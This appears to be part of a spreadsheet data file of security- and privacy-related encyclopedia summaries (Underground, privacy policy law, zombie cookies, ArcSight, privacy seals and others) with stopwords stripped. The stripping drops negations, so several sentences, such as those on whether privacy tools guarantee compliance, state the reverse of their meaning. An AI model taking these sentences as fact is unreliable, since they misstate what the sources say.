complex. security standards regulations cert secure coding iso/iec 27034-1:2011 information technology security techniques application security part overview concepts iso/iec 24772:2013 information technology programming languages guidance avoiding vulnerabilities programming languages language selection nist special publication 800-53 owasp asvs: application security verification standard also application service architecture (asa) data security mobile security owasp security development lifecycle trustworthy computing security development lifecycle references</t>
  </si>
  <si>
    <t>Underground (Dreyfus book)</t>
  </si>
  <si>
    <t>underground: tales hacking, madness obsession electronic frontier 1997 book suelette dreyfus, researched julian assange. describes exploits group australian, american, british black hackers late 1980s early 1990s, among assange himself. craig bowen (nickname), administrator important australian (pacific island zen) par, a.k.a. parmaster, american hacker avoided capture united states secret service july 1989 november 1991 phoenix, electron nom, convicted first major australian trial computer crimes gandalf, british founders notorious 8lgm group australian mendax (julian assange) prime suspect, managed penetrate ddn, nortel internal network, phreaker trax. together, three known "international subversives". anthrax, another australian hacker phreakerthe book also mentions hackers contacts protagonists, among erik bloodaxe legion doom corrupt masters deception. first chapter underground relates diffusion reactions computer security community wank worm attacked computers decnet 1989 purportedly coded melbourne hacker. 2010, book sold 10,000 copies. author made electronic edition book freely available 2001, announced slashdot, server housing book crashed demand book. reached 400,000 downloads within years.the 2002 documentary realm hackers, directed kevin anderson centered phoenix electron, inspired book. also list computer books references external links book website underground: hacking, madness obsession electronic frontier dreyfus project gutenberg online version book</t>
  </si>
  <si>
    <t>Privacy policy</t>
  </si>
  <si>
    <t>privacy policy statement legal document privacy law) discloses ways party gathers, uses, discloses, manages customer client's data. personal information anything used identify individual, limited person's name, address, date birth, marital status, contact information, issue, expiry date, financial records, credit information, medical history, travels, intentions acquire goods services. case business, often statement declares party's policy collects, stores, releases personal information collects. informs client specific information collected, whether kept confidential, shared partners, sold firms enterprises. privacy policies typically represent broader, generalized treatment, opposed data statements, tend detailed specific. exact contents certain privacy policy depend upon applicable need address requirements across geographical boundaries legal jurisdictions. most countries legislation guidelines covered, information collected, used for. general, data protection laws europe cover private sector, well public sector. their privacy laws apply government operations also private enterprises commercial transactions.california business professions code, internet privacy requirements (caloppa) mandate websites collecting personally identifiable information (pii) california residents must conspicuously post privacy policy. (see also online privacy protection act) history 1968, council europe began study effects technology human rights, recognizing threats posed computer technology could link transmit ways widely available before. 1969 organisation economic co-operation development (oecd) began examine implications personal information leaving country. council recommend policy developed protect personal data held private public sectors, leading convention 108. 1981, convention protection individuals regard automatic processing personal data (convention 108) introduced. first privacy laws ever enacted swedish data 1973, followed west german data protection 1977 french informatics, data banks freedoms 1978.in united states, concern privacy policy starting around late 1960s 1970s passage fair credit reporting act. although designed privacy law, gave consumers opportunity examine credit files correct errors. also placed restrictions information credit records. several congressional study groups late 1960s examined growing ease automated personal information could gathered matched information. group advisory committee united states department health human services, 1973 drafted code principles called fair information practices. work advisory committee privacy 1974. united states signed organisation economic co-operation development guidelines 1980.in canada, privacy commissioner canada established canadian human rights 1977. 1982, appointment privacy commissioner part privacy act. canada signed oecd guidelines 1984. fair information practice there significant differences data protection data privacy laws. these standards must businesses operating also organization transfers personal information collected concerning citizens 2001 united states department commerce worked ensure legal compliance organizations opt-in safe harbor program. approved truste certify streamlined compliance us-eu safe harbor. current enforcement 1995 european union (eu) introduced data protection directive member states. result, many organizations business within began draft policies comply directive. year, u.s. federal trade commission (ftc) published fair information principles provided non-binding governing principles commercial personal information. while mandating policy, principles provided guidance developing concerns draft privacy policies. united states specific federal regulation establishing universal implementation privacy policies. congress has, times, considered comprehensive laws regulating collection information online, consumer internet privacy enhancement online privacy protection 2001, none enacted. 2001, stated express preference "more enforcement, laws" promoted continued focus industry self-regulation. many cases, enforces terms privacy policies promises made consumers using authority granted section prohibits unfair deceptive marketing practices. ftc's powers statutorily restricted cases; example, airlines subject authority federal aviation administration (faa), cell phone carriers subject authority federal communications commission (fcc).in cases, private parties enforce terms privacy policies filing class action lawsuits, result settlements judgments. however, lawsuits often option, arbitration clauses privacy policies terms service agreements. applicable united states while generally applicable exists, federal laws govern privacy policies specific circumstances, children's online privacy protection (coppa) affects websites knowingly collect information targeted children websites must post privacy policy adhere enumerated information-sharing restrictions coppa includes "safe harbor" provision promote industry self-regulation. gramm-leach-bliley requires institutions "significantly engaged" financial activities give "clear, conspicuous, accurate statements" information-sharing practices. also restricts sharing financial information. health insurance portability accountability (hipaa) privacy rules requires notice writing privacy practices health care services, requirement also applies health service electronic. california consumer privacy (ccpa) gives consumers control personal information businesses collect ccpa regulations provide guidance implement law. california privacy rights 2020 (cpra) expands privacy information security obligations employers business california.some states implemented stringent regulations privacy policies. california online privacy protection 2003 business professions code sections 22575-22579 requires "any commercial websites online services collect personal information california residents site conspicuously post privacy policy site". both nebraska pennsylvania laws treating misleading statements privacy policies published websites deceptive fraudulent business practices. canada canada's federal privacy applicable private sector formally referred personal information protection electronic documents (pipeda). purpose establish rules govern collection, use, disclosure personal information commercial organizations. organization allowed collect, disclose amount information purposes reasonable person would consider appropriate circumstance.the establishes privacy commissioner canada ombudsman addressing complaints filed organizations. commissioner works resolve problems voluntary compliance, rather heavy-handed enforcement. commissioner investigates complaints, conducts audits, promotes awareness undertakes research privacy matters. european union right privacy highly developed area europe. member states european union (eu) also signatories european convention human rights (echr). article echr provides right respect one's "private family life, home correspondence", subject certain restrictions. european court human rights given article broad interpretation jurisprudence.in 1980, effort create comprehensive data protection system throughout europe, organization economic co-operation development (oecd) issued "recommendations council concerning guidelines governing protection privacy trans-border flows personal data". seven principles governing oecd’s recommendations protection personal data were: notice—data subjects given notice data collected; purpose—data used purpose stated purposes; consent—data disclosed without data subject's consent; security—collected data kept secure potential abuses; disclosure—data subjects informed collecting data; access—data subjects allowed access data make corrections inaccurate data; accountability—data subjects method available hold data collectors accountable following principles.the oecd guidelines, however, nonbinding, data privacy laws still varied widely across europe. endorsing oecd’s recommendations, nothing implement within united states. however, seven principles incorporated directive.in 1995, adopted data protection directive, regulates processing personal data within there significant differences data protection equivalent u.s. data privacy laws. these standards must businesses operating also organization transfers personal information collected concerning citizen 2001 united states department commerce worked ensure legal compliance organizations opt-in safe harbor program. approved number providers certify compliance us-eu safe harbor. since 2010 safe harbor criticised especially german publicly appointed privacy protectors ftc's assert defined rules implemented proper even revealing disharmonies.effective 2018, data protection directive superseded general data protection regulation (gdpr), harmonizes privacy rules across member states. gdpr imposes stringent rules collection personal information belonging data subjects, including requirement privacy policies concise, clearly-worded, transparent disclosure collection, processing, storage, transfer personally identifiable information. data controllers must also provide opportunity data made portable common format, erased certain circumstances. australia privacy 1988 provides legal framework privacy australia. includes number national privacy principles. there thirteen privacy principles privacy act. oversees regulates collection, disclosure people's private information, makes sure responsible violation, rights individuals access information. india information technology (amendment) act, 2008 made significant changes information technology act, 2000, introducing section 43a. this section provides compensation case corporate body negligent implementing maintaining reasonable security practices procedures thereby causes wrongful loss wrongful gain person. this applies corporate body possesses, deals handles sensitive personal data information computer resource owns, controls operates. 2011, government india prescribed information technology (reasonable security practices procedures sensitive personal data information) rules, 2011 publishing official gazette. these rules require body corporate provide privacy policy handling dealing personal information including sensitive personal data information. such privacy policy consist following information accordance rules: clear easily accessible statements practices policies; type personal sensitive personal data information collected; purpose collection usage information; disclosure information including sensitive personal data information; reasonable security practices procedures.the privacy policy published website body corporate, made available view providers information provided personal information lawful contract. online privacy certification programs online certification "seal" programs example industry self-regulation privacy policies. seal programs usually require implementation fair information practices determined certification program require continued compliance monitoring. trustarc (formerly truste), first online privacy seal program, included 1,800 members 2007. other online seal programs include trust guard privacy verified program, etrust, webtrust. technical implementation some websites also define privacy policies using internet content rating association (icra), allowing browsers automatically assess level privacy offered site, allowing access site's privacy practices line user's privacy settings. however, technical solutions guarantee websites actually follows claimed privacy policies. these implementations also require users minimum level technical knowledge configure browser privacy settings. these automated privacy policies popular either websites users. reduce burden interpreting individual privacy policies, re-usable, certified policies available policy server proposed jøsang, fritsch mahler. criticism many critics attacked efficacy legitimacy privacy policies found internet. concerns exist effectiveness industry-regulated privacy policies. example, 2000 report privacy online: fair information practices electronic marketplace found vast majority websites surveyed manner privacy disclosure, meet standard principles. addition, many organizations reserve express right unilaterally change terms policies. june 2009 website tosback began tracking changes popular internet services, including monitoring privacy policies amazon, google facebook.there also questions whether consumers understand privacy policies whether help consumers make informed decisions. 2002 report stanford persuasive technology contended website's visual designs influence website's privacy policy consumers assessed website's credibility. 2007 study carnegie mellon university claimed "when presented prominent privacy information..." consumers "…likely make purchases vendor lowest price, regardless site's privacy policies". however, study also showed information privacy practices clearly presented, consumers prefer retailers better protect privacy willing "pay premium purchase privacy protective websites". furthermore, 2007 study university california, berkeley found "75% consumers think long site privacy policy means share data third parties," confusing existence privacy policy extensive privacy protection. based common nature misunderstanding, researcher joseph turow argued u.s. federal trade commission term "privacy policy" thus constitutes deceptive trade practice alternative phrasing like "how information" used instead.privacy policies suffer generally lack precision, especially compared emerging form data statement. where privacy statements provide general overview data collection use, data statements represent much specific treatment. result, privacy policies meet increased demand transparency data statements provide. critics also question consumers even read privacy policies understand read. 2001 study privacy leadership initiative claimed consumers read privacy policies carefully, briefly glanced never read privacy policies. average website user read privacy statement uncertainty trustworthiness website before. possible issue length complexity policies. according 2008 carnegie mellon study, average length privacy policy 2,500 words requires average minutes read. study cited "privacy policies hard read" and, result, "read infrequently". however, efforts make information presentable simplify information point convey extent users' data shared sold. this known 'transparency paradox.' references further reading gazaleh, mark (2008) online trust perceived utility consumers privacy statements, london, 35pp. cavoukian, (1995). knows: safeguarding your privacy networked worldwide (paperback). random house canada: random house. isbn 0-394-22472-8.</t>
  </si>
  <si>
    <t>UniKey</t>
  </si>
  <si>
    <t>unikey technologies alternative access control company based united states designs licenses keyless entry technology worldwide. first product partnership kwikset kēvo, bluetooth-enabled deadbolt door lock. history unikey technologies founded 2010 florida phil dumas, serves president chief executive officer. electrical engineering degree university central florida background biometric security. dumas part team launched smartscan, first mass-market biometric residential deadbolt lock. started unikey effort create dependable convenient access everything.unikey technologies first came public's attention 2012, dumas appeared abc's reality series shark tank. unikey received investment offers five judges show, including offer $500,000 equity stake mark cuban kevin o'leary. dumas accepted offer, ultimately unable come terms show. 2013, unikey raised approximately $2.6 million funding, venture capital. that year, unikey announced licensing deal kwikset, largest residential lock manufacturer united states largest world, manufacture distribute kēvo, residential smart lock using unikey's technology. products launched 2013, kēvo first bluetooth-enabled touch-to-open smart lock. kēvo ability detect user's compatible smartphone tablet app, lock unlock door. deadbolt lock senses user's phone nearby outside; phone emits low-energy bluetooth signal, allowing door unlocked lock face touched, making unnecessary interact phone order open door. users grant unrestricted temporary access phones well. kēvo also comes keychain provides touch-to-open function authorized smart phone. prime security feature product unikey's inside/outside intelligence, detects whether verified device currently inside outside home. authorized device known inside house, unauthorized users unable activate kēvo outside. system acts one-way filter lets authorized users pass entryway. partnerships june 2014, unikey miwa lock company announced partnership offer keyless entry hotels. unikey developed touch-to-open passive keyless entry system integrated miwa's existing radio-frequency identification hospitality locks. keys activated smartphone apps. when guests check app, sent room number phone enabled virtual key. following miwa partnership, unikey making commercial access control industry partnerships grosvenor technologies nortek security control. company also expanded international reach partnership home security company era. milestones references external links official website</t>
  </si>
  <si>
    <t>Zone-H</t>
  </si>
  <si>
    <t>zone-h archive defaced websites. established estonia march 2002. whois request domain shows created february 2002. product once defaced website submitted zone-h, mirrored zone-h servers. website moderated zone-h staff check defacement fake. sometimes, hackers submit hacked pages site. internet security portal containing original security news, digital warfare news, geopolitics, proprietary general advisories, analyses, forums, researches. zone-h largest intrusions archive. published several languages. recently zone-h banned indian isps legal prosecution indian government. zone-h popular iran turkey. references</t>
  </si>
  <si>
    <t>Public recursive name server</t>
  </si>
  <si>
    <t>public recursive name server (also called public resolver) name server service networked computers query domain name system (dns), decentralized internet naming system, place addition name servers operated local internet service provider (isp) devices connected. reasons using services include: speed, compared using services filtering (security, ad-blocking, porn-blocking, etc.) reporting avoiding censorship redundancy (smart caching) access unofficial alternative level domains found official root zone temporary unavailability isp's name serverpublic resolver operators often cite increased privacy advantage services; critics public services cited possibility mass data collection targeted public resolvers potential risk using services. several services support secure lookup transport services https (doh) (dot). public resolvers operated either commercial companies, offering service free public, private enthusiasts help spread technologies support non-profit communities. notable public service operators references external links home page dnscrypt project: public servers</t>
  </si>
  <si>
    <t>Perimeter security</t>
  </si>
  <si>
    <t>perimeter security refers natural barriers built fortifications either keep intruders keep captives contained within area boundary surrounds. purpose since least roman empire, fortifications, walls barriers important part protecting sovereign territories private property. perimeter security designed primary purpose either keep intruders captives contained within area boundary surrounds. both natural manmade barriers serve perimeter security.governments perimeter security safety citizens, control flow commerce immigration, well protect vital infrastructure vandals terrorists. property owners organizations sizes various man-made technology achieve varying degrees perimeter security. history earliest known instances perimeter security large scale hadrian's wall roman empire. around wall built along northern border empire turf later, stone. theories regarding wall's purpose vary, agree probably built least part defense empire. perhaps obvious illustration perimeter security ancient times, great wall china originally built withstand nomadic invaders north. wall successful degree, although suggested served psychological barrier successful physical barrier.in warfare, securing perimeter proven vital military forces. from sharpened pikes medieval times modern technological solutions, armed forces always sought prevent enemies breaching front lines. american civil world wars, well korean vietnam wars, landmines used extensively create tactical barriers enemy lines. these tactics sometimes controversial loss civilian life.in world german military developed concrete barriers called dragon's teeth slow approach enemy tanks. this tactic adopted allied forces, lines reinforced concrete pyramids still seen throughout europe today. example perimeter protection still razor wire fencing. while u.s. ranchers 19th century kept cattle rustlers barbed wire, world advent specialized barbed wire secure military operations. 1965 escalation vietnam accelerated successful penetration foot high concertina wire (razor wire) fencing around camp holloway. variations type perimeter protection used prolifically throughout 20th century. booby traps, electric fencing, watch towers night flares also vigorously employed keep enemy forces out. natural barriers mountains, rivers, oceans, deserts, canyons glaciers world long provided natural barrier invasion trade among competing cultures. india's isolation rest asia himalayas prime example. english channel proved invaluable world deterrent nazi aggression. england's relative isolation allowed allied forces staging area d-day invasion, turned tide war. rocky mountains north america proved formidable perimeter protection isolated native cultures centuries. likewise, exploitation alaska's rich resources greatly delayed innovation lagged breaking oceanic perimeter. technology largely subjugated world's great natural barriers. however, deep amazon remain tribes somewhat protected global society natural barrier naturally harsh conditions vast tributary system amazon river. similar argument made regarding world's deserts. even advanced technology, lack water harsh temperatures make traversing living world's deserts journey relative few. sahara desert prime example. fences invented mid-1800s, chain link fence achieve major adoption industrialized manufacturing began united states 1898. still heavy today, relatively cost effective perimeter popular transparency, strength, storage, ease installation. from airports school playgrounds, chain link fencing demand remains strong long-term perimeter solution. however, fences alone easily circumvented, well known incidences airport perimeter security breaches, scaling fence white house, etc. most perimeter protection solutions past large-scale, stationary solutions. this causes great challenge today's mobile industry military. with smaller, rapid deployment forces norm today's military engagements, large walls, high fences, permanent solutions aren’t always effective. deployments iraq afghanistan provide good examples. electronic technology beginning advent electronic sensors, concept perimeter security evolved rapidly include modern, technological solutions. this allows private entities governments protect wider areas less manpower involved. world radar first introduced detect airplanes ships later ground targets. later, ground surveillance radar coupled steerable cameras automatically cued onto targets quick evaluation threat. these systems large expensive. military, small force deployment created complex perimeter protection problems. also created opportunities innovation. secure wireless communications, lightweight weaponry, faster transport portable perimeter protection become vital success missions. compact surveillance radar (csr) deployable minutes provides temporary portable perimeter security.while military applications pressed innovation mobile, affordable perimeter protection, today's growing threats homeland security launched another wave pioneering products protect airports, bridges, harbors, dams electrical substations. these include solutions thermal cameras, compact radar, microwave radiowave fences, biometric scanning, linked smartphone tablet technology. also access control perimeter fence crime scene references</t>
  </si>
  <si>
    <t>Perimeter 81</t>
  </si>
  <si>
    <t>perimeter israeli cloud network security company develops secure remote networks, based zero trust architecture, organizations. technology replaces legacy security appliances like vpns firewalls. june 2022 company announced raised $100 million, billion valuation. history company founded 2018 sagi gidali amit bareket, founders safervpn acquired global. safervpn network infrastructure, developed years, served basis perimeter 81's initial product development.based aviv, israel, company raised 19.5 million dollars three funding rounds 2019–2020, including investments usa's sonicwall (francisco partners), toba capital israel's spring ventures. june 2020 raised funds million dollars valuation. august 2020 completed million series financing round company valuation $160 million. june 2022 completed series financing round usa's capital fund, participation insight partners, entree capital, toba capital crossover ventures. raised $100 million, valuation, becoming unicorn. company 2,500 clients, among fortune companies, well small medium-sized enterprises. technology company develops converged networking security cloud edge delivered software service model. offers global gateway deployment multi-tenant management, allowing distributed workforce securely access company resources, whether located cloud on-premises. platform intends replace traditional service firewall service (fwaas) solution. user-centric security bearing, dedicated preventing password theft attacks. protects online users using secure gateway, replacing multiprotocol label switching enabling connection offices sd-wan. perimeter offers service ingram cloud marketplace partnered sentinelone deliver unified network endpoint security. company also partnered sonicwall incorporate cyber security firewall features secure access service edge (sase) platform. perimeter chosen gartner “cool vendor network cyber-physical systems security”, selected frost sullivan technology leadership award winner, recognized fastest-growing tech companies deloitte chosen finalist ingram micro comet competition. company also cybersecurity vendor achievement year, cybersecurity breakthrough award finalist nycx cybersecurity moonshot challenge, held jerusalem venture partners, together york mayor’s office. chosen five leading companies zero-trust network access forrester research. also list unicorn startup companies science technology israel silicon wadi references</t>
  </si>
  <si>
    <t>Privacy platform</t>
  </si>
  <si>
    <t>privacy platform piece software system designed retain privacy users operators. examples private.me geens.com references</t>
  </si>
  <si>
    <t>Redcare</t>
  </si>
  <si>
    <t>redcare largest supplier alarm signalling services security fire established thirty years ago, works business domestic markets. redcare widely deployed service used redcare signalling fitted alarm installation companies (“installers”), provides signal customer’s premises alarm receiving centre (arc). arcs monitor signal hours and, necessary, alert customer, nominated persons, police fire services.the redcare network 99.997% reliability dedicated network developed security alarm fire alarm signalling. supported technology.the system transmits continuous signal standard telephone line, also used voice broadband services, prevent alarm systems defeated line cut. redcare works voice frequency spectrum phone line order avoid interference calls broadband, uses frequencies voice spectrum. other versions also (mobile) backup main phone line function using either wireless (2g/3g mobile data) primary connection backed alternative signalling path. these 2g/3g offerings marketed redcare secure product range. redcare fire security product insurer-endorsed 1277 third-party certification. company’s products include: security redcare classic redcare roaming redcare secure redcare secure redcare secure redcare secure solo fire redcare secure fire redcare secure fire redcare classic fire references external links national security inspectorate: gold approval criteria. http://www.nsi.org.uk/wp-content/uploads/2012/10/sf006-1-arc-criteria.pdf. retrieved november 2017 what redcare? http://www.redcare.bt.com/what/ retrieved december 2017</t>
  </si>
  <si>
    <t>Personyze</t>
  </si>
  <si>
    <t>personyze start-up company based aviv, israel, provides software service (saas) website personalization. history personyze founded november 2008 aviv, israel, yakov shabat danny hen. within years, became leading personalization website providers, facebook integration behavioral targeting.personyze also provides analytics testing. june 2011 rapleaf announced partnership personyze allow demographics database july 2011 introduced plugins content management systems wordpress joomla. criticism personyze criticized forbes contributing filter bubble, technology sorts everything basis user's activities consequently present visitors portion content/offers, excluding content/offers ever presented them. references external links official websiterussian website- http://www.personyze.ru</t>
  </si>
  <si>
    <t>ArcSight</t>
  </si>
  <si>
    <t>micro focus arcsight cyber security product, first released 2000, provides data security analytics intelligence software security information event management (siem) management. arcsight designed help customers identify prioritize security threats, organize track incident response activities, simplify audit compliance activities. arcsight became subsidiary hewlett-packard 2010. merged micro focus september 2017. history arcsight incorporated 2000, initially headquartered cupertino, california. alex daly founding hugh njemanze founding cto. pravin kothari founding vice president engineering. figley first director sales. arcsight originally called wahoo technologies.the original business plan build caching acceleration platform, though, customer interviews getting feedback prospective customers, figley identified problem industry "too much data" founders shifted strategy provide security events analysis correlation. company formally named arcsight january 2001. july 2001, alex daly succeeded robert shaw ceo. arcsight filed initial public offering september 2007 offered shares february 2008 symbol arst. silicon valley company enter nasdaq 2008, great recession technology companies went public. reilly appointed 2008. robert shaw retired effective october 2008, citing health reasons. september 2010, hewlett-packard (hp) announced agreement acquire arcsight approximately $1.5 billion. arcsight launched version logger technology, well identityview 2.0. october 2010, completed acquisition. arcsight said thousand customers time.on september 2016, whitman announced software assets hewlett packard enterprise, including arcsight rest enterprise security products group, would spun merged micro focus create independent company enterprise shareholders would retain majority ownership. micro focus kevin loosemore called transaction "entirely consistent established acquisition strategy focus efficient management mature infrastructure products" indicated micro focus intended "bring core earnings margin mature assets deal percent total percent today micro focus's existing percent level within three years." merge concluded september 2017. january 2019, arcsight portfolio released arcsight version 7.0, arcsight express version 5.0, arcsight investigate version 2.20, arcsight data platform version 2.31 (including arcsight's logger, arcmc event broker technology).on february 2019, micro focus announced acquired interset, security analytics software company provides cyber-threat protection, announced plans interset's technology additional value micro focus arcsight. references</t>
  </si>
  <si>
    <t>201 CMR 17.00</t>
  </si>
  <si>
    <t>massachusetts general chapter regulations 17.00 require companies persons store personal information (pi) massachusetts resident develop written, regularly audited plan protect personal information. both electronic paper records need comply law. regulations went effect march 2010. originally supposed effect january 2009, pushed january 2010 march 2010 state economy confusion law.identity theft fraud major concerns core implementation 17.00. example, massachusetts resident's information leaked captured, could serious consequences business allowed breach individual whose information leaked. therefore, making changes keep residents' information secure required avoid security breach fines. according regulations, companies need written security plan safeguard contacts' and/or employees personal information. need illustrative policies demonstrate technical, physical, administrative protection residents’ information. plan need written meet industry standards. companies designate employees oversee manage security procedures workplace, well continuously monitor address security hazards. policies addressing employee access transportation personal information need developed, well disciplinary measures employees conform regulations. limiting collection data minimum needed purpose used also part regulations. further reading 17.00 statute 12/5/2011 17.00 compliance check list requirements security breach notifications chapter compliance 17:00: standards protection personal information residents commonwealth references</t>
  </si>
  <si>
    <t>Apache Rampart module</t>
  </si>
  <si>
    <t>apache rampart implementation ws-security standard axis2 services engine apache software foundation. supplies security features services implementing following specifications: ws-security ws-securitypolicy ws-trust ws-secureconversation saml saml also free software foundation open software foundation external links apache rampart apache software foundation apache rampart c-language implementation apache software foundation apache axis2 apache software foundation services security policy language v1.1 specification security services world: proposed architecture roadmap ws-securitypolicy oasis standard</t>
  </si>
  <si>
    <t>Zombie cookie</t>
  </si>
  <si>
    <t>zombie cookie data code placed server, visitor visits website, visitor's computer device hidden location outside visitor's browser's dedicated cookie storage location, automatically recreates http cookie regular cookie original cookie deleted. this data code stored online directly visitor's device, breach browser security. this mechanism makes zombie cookies difficult remove. since entirely rely normal cookie protocols, visitor's browser continue recreate deleted cookies even though user opted receive cookies. term used attorney joseph malley, initiated super-cookie class actions 2010. purpose analytics collecting companies cookies track internet usage pages visited marketing research. sites want collect user statistics install cookie traffic tracking site collect data user. user surfs around cookie information site uses traffic tracking cookie sends back main tracking server. zombie cookies allow traffic tracking companies retrieve information previous unique user continue tracking personal browsing habits. when user stored outside single browser's cookie storage, header injected network http requests, zombie cookies track users across browsers machine.zombie cookies also used remember unique used logging websites. this means user deletes cookies regularly, site using would still able personalize specific user. implications user want tracked choose decline block third party cookies delete cookies browsing session. deleting cookies prevent sites tracking user also interfere sites users want remember them. removing tracking cookies declining cookies. cookies deleted, data collected tracking companies becomes fragmented. example, counting person separate unique users would falsely increase particular site's unique user statistic. this tracking companies type zombie cookie. implementation according truste: "you valuable marketing insight tracking individual users' movements site. must disclose personally identifiable information order comply fair information practices guidelines".possible places zombie cookies hidden include: standard http cookies storing cookies reading history storing cookies http etags internet explorer userdata storage (starting ie9, userdata longer supported) html5 session storage html5 local storage html5 global storage html5 database storage sqlite storing cookies values auto-generated, force-cached pngs using html5 canvas read pixels (cookies) back local shared objects (flash cookies) silverlight isolated storage cookie syncing scripts function cache cookie respawn muid cookie fast open tls's session idif user able remove cookie every data stores cookie recreated stores next visit site uses particular cookie. every company implementation zombie cookies kept proprietary. open-source implementation zombie cookies, called evercookie, available. controversies 2015, turn, online advertising clearinghouse, introduced zombie cookies based flash local shared objects. privacy advocates quickly denounced technology.an academic study zombie cookies completed 2009, team researchers berkeley, noticed cookies deleted, kept coming back, again. they cited serious privacy breach. since users barely aware storage methods used, unlikely users ever delete all. from berkeley report: "few websites disclose flash privacy policies, many companies using flash privacy certified truste."ringleader digital made effort keep persistent user even user deleted cookies html5 databases. opt-out tracking, company's opt-out link, gives confirmation. this resulted lawsuit ringleader digital. term "zombie cookie" created attorney joseph malley initiated super-cookie class actions 2010. etiology phrase derived prior research apple's third-party iphone applications. some criticized "zombie-like" applications "super-cookies" "re-spawned" deleted. attorney malley envisioned cookie seemed come back "dead". blending ideas, first coined phrase zombie cookies within filed class actions, means enable court, jury, public understand basis litigation.the zombie cookie lawsuits filed suit united states district court central district california quantcast, clearspring, videoegg, affiliated sites owned walt disney internet group, warner bros. others. according charges, adobe flash cookies planted "track plaintiffs class members visited non-clearspring flash cookie affiliates websites online transmissions intercepted, without notice consent".two "supercookie" mechanisms found microsoft websites 2011, including cookie syncing respawned muid cookies. media attention, microsoft later disabled code.consumer outrage related flash cookies violation consumers' privacy caused u.s. congressional hearings, senators franken john rockefeller. reportedly, "zombie cookie", flash cookie filings, forced adobe systems inc. stop processing flash cookies consumers' computing devices.the online advertising clearinghouse turn implemented zombie cookies verizon mobile phones, using hidden, unremovable number verizon could track customers. after article propublica revealed fact january 2015, turn claimed suspended usage zombie cookies. references external links device fingerprint site demonstrates zombie cookies restored</t>
  </si>
  <si>
    <t>Win–loss analytics</t>
  </si>
  <si>
    <t>win–loss analytics involves identifying analyzing reasons visitor website persuaded engage desired action (conversion). this information allows teams improve website's navigation content, identify individuals likely convert, improve marketing efforts. history determining person engaged desired action another long topic interest sales, measurement conversion always possible sales data.in contrast, marketing mostly concerned targeting masses, results marketing traditionally difficult accurately measure. with internet, much easier marketers collect data analysis evaluation order understand demonstrate effectiveness ineffectiveness efforts make changes improve them. thus yielding best result specific marketing campaign. this win-loss analytics. win–loss analytics analytics analytics tools existed since early days internet ubiquitous. these tools provide bird's view website's traffic. information gathered allows webmasters make informed decisions making changes order improve website. win–loss analytics tools track individual perspectives visitor, uncovering visitor was, products qualified for, well persuaded, convert. loss programs typically focus different elements buying process, including gathering buyer feedback solution sold (whether product service), buyer's perception effectiveness sales representative sales team, buyer perceptions selling vendor overall (such firm's reputation long-term financial viability), price. these categories broken greater detail refined feedback. example, questions product service might include intuitiveness user interface effectiveness specific features functionality. references</t>
  </si>
  <si>
    <t>Perimeter intrusion detection system</t>
  </si>
  <si>
    <t>perimeter intrusion detection system (pids) device sensor detects presence intruder attempting breach physical perimeter property, building, secured area. pids typically deployed part overall security system often found high-security environments correctional facilities, airports, military bases, nuclear plants. types pids wide range intrusion detection technologies exist current marketplace. u.s. army, part reference material personnel responsible planning executing security programs, divides pids technologies following categories: active break wire electrostatic field fence detection (typically microphonic cable accelerometer mounted fence) ground motion magnetic microwave detectors near-ir beam break passive ported coaxial cable taut wire seismic primary application pids typically acts early warning system, alerting site's alarm system intruder still perimeter building interior area. pids replacement surveillance cameras. technologies work together, pids providing early intrusion detection cameras provide real-time assessment capabilities. pids often integrated security products like signage, security lighting, intercom systems, loudspeakers help deter potential intruders. references</t>
  </si>
  <si>
    <t>Apache Fortress</t>
  </si>
  <si>
    <t>apache fortress open source project apache software foundation subproject apache directory. authorization system, written java, provides role-based access control, delegated administration password policy using ldap backend. standards implemented: role-based access control (rbac) ansi incits administrative role-based access control (arbac02) ietf password policy (draft) unix users groups (rfc2307)fortress four separate components: core security authorization apis. realm container plug-in provides security apache tomcat container. rest http protocol wrappers core apis using apache cxf. html pages core apis using apache wicket. history fortress first contributed 2011 openldap foundation moved apache directory project 2014. releases fortress provides security functions apis corresponding standards implemented. example, rbac design mimics functional specifications ansi incits function names, entities same. references external links apache fortress project page py-fortress pypi</t>
  </si>
  <si>
    <t>CodeSignal</t>
  </si>
  <si>
    <t>codesignal technical interview assessment platform operated american company brainfights, inc. founded 2014 headquartered francisco, company raised $87.5 million total funding, series round september 2021. history codesignal, initially called codefights, founded 2014 tigran sloyan, aram shatakhtsyan, felix desroches.codefights provided platform developers compete head-to-head timed coding challenges. 2017, codefights began offer interview practice mode, well product recruiters connect qualified technical candidates.in 2018, company changed name platform codefights codesignal, introduced coding score developers could share technical recruiters, based challenges completed codesignal. since then, codesignal platform expanded offer suite technical interview assessment products. platform codesignal platform consists tech screen, pre-screen, interview products used technical recruiters hiring managers source qualify candidates software engineering positions. users select bank coding tasks, create custom coding questions, skills assessment framework like general coding assessment (gca). codesignal cloud-based software service (saas) product integrates applicant tracking systems (ats) like greenhouse lever. funding company raised initial $2.5 million seed funding april 2015, included investments felicis ventures (aydin senkut), sutter hill ventures (mike speiser), liveramp auren hoffman, google shopping express founder fallows, twitter engineering raffi krikorian, quora adam d'angelo godaddy engineering marek olszewski. codesignal raised million november 2016. series funding round e.ventures. other investors round included angel, capital, granatus ventures, felicis ventures. codesignal raised million series funding december 2020, menlo ventures, followed million series round index ventures september 2021. customers codesignal customers include brex, databricks, facebook, instacart, robinhood markets, upwork zoom. also karat hackerrank references external links codesignal</t>
  </si>
  <si>
    <t>Privacy seal</t>
  </si>
  <si>
    <t>privacy seal type trust seal trustmark granted third party providers display company's website. companies annual (usually ranging hundred several thousand u.s. dollars) image third party provider's seal pasted onto homepage privacy policy page. users oftentimes click seal redirected assurance seal service's website verifies validity privacy seal. they meant visual assurance consumers website question meets certain standard privacy. idea privacy seal originates physical manifestation companies long sought seals approval like good housekeeping placed tangible products order draw customers value "quality". while assurance seal services follow guidelines federal trade commission, providers additional requirements. checks conducted regular random basis ensure compliance. privacy seals applied various types e-commerce websites. some seal providers even create special privacy seal geared toward certain product like mobile apps accounting. there many privacy compliance technology companies, notably trustarc (formerly truste), canada webtrust, privacy bbbonline.the u.s. regulate e-commerce privacy stringently europe countries world. with mind, u.s. companies freedom comes disclosure notices selling data third parties advertising purposes. american based privacy seal companies make pivot toward broader field reliability assurance complaint resolution european marketplace. privacy seals also major presence accounting industry canada general e-commerce japan south korea. privacy seals meant boost customers' perception company's website safety regard privacy protection. assurance seal services also online dispute resolution. button public policy issue whether u.s. government regulate privacy e-commerce. past controversies concerns caused need privacy seals come question. origin privacy seals around since 1990s trustarc seal program founded 1996 bbbonline's 1998. privacy seals self-regulatory tools invented combat privacy concerns without governmental legislation. with rise e-commerce, became apparent privacy concerns deterring potential customers. when purchasing 